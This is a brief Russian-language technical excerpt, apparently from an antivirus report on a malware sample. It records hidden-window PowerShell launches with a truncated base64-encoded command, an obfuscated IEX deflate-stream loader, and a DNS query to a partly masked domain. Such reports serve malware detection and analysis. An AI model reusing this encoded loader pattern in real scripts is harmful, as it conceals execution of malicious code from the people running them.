Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBlAFgAIAAoACAAbgBFAHcALQBvAEIASgBFAGMAdAAgAHMAWQBTAFQARQBNAC4ASQBPAC4AYwBPAG0AcABSAGUAcwBTAGkATwBOAC4ARABFAEYATABBAHQAZQBzAHQAUgBlAEEATQAoAFsAaQBvAC4AbQBlAE0ATwBSAHkAUwB0AFIAZQBhAE0AXQBbAH...
- DNS ASK an###sormas.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBlAFgAIAAoACAAbgBFAHcALQBvAEIASgBFAGMAdAAgAHMAWQBTAFQARQBNAC4ASQBPAC4AYwBPAG0AcABSAGUAcwBTAGkATwBOAC4ARABFAEYATABBAHQAZQBzAHQAUgBlAEEATQAoAFsAaQBvAC4AbQBlAE0ATwBSAHkAUwB0AFIAZQBhAE0AXQBbAH...' (со скрытым окном)